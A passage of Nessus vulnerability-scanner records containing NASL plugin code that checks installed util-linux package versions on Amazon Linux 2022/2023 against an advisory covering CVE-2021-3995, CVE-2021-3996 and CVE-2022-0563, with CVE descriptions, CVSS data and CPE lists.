'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / 
libblkid-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:45:50", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2023-024 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an INPUTRC environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. 
(CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-03-21T00:00:00", "type": "nessus", "title": "Amazon Linux 2023 : libblkid, libblkid-devel, libfdisk (ALAS2023-2023-024)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-04-20T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", "p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user", "p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2023"], "id": "AL2023_ALAS2023-2023-024.NASL", "href": "https://www.tenable.com/plugins/nessus/173184", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2023 Security Advisory ALAS2023-2023-024.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(173184);\n script_version(\"1.1\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/20\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"Amazon Linux 2023 : libblkid, libblkid-devel, libfdisk (ALAS2023-2023-024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2023 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2023-024 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an INPUTRC environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. 
(CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2023/ALAS-2023-024.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-0563.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update util-linux --releasever=2023.0.20230222 ' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2023\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"-2023\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2023\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'libblkid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2023.0.3', 
'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 
'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 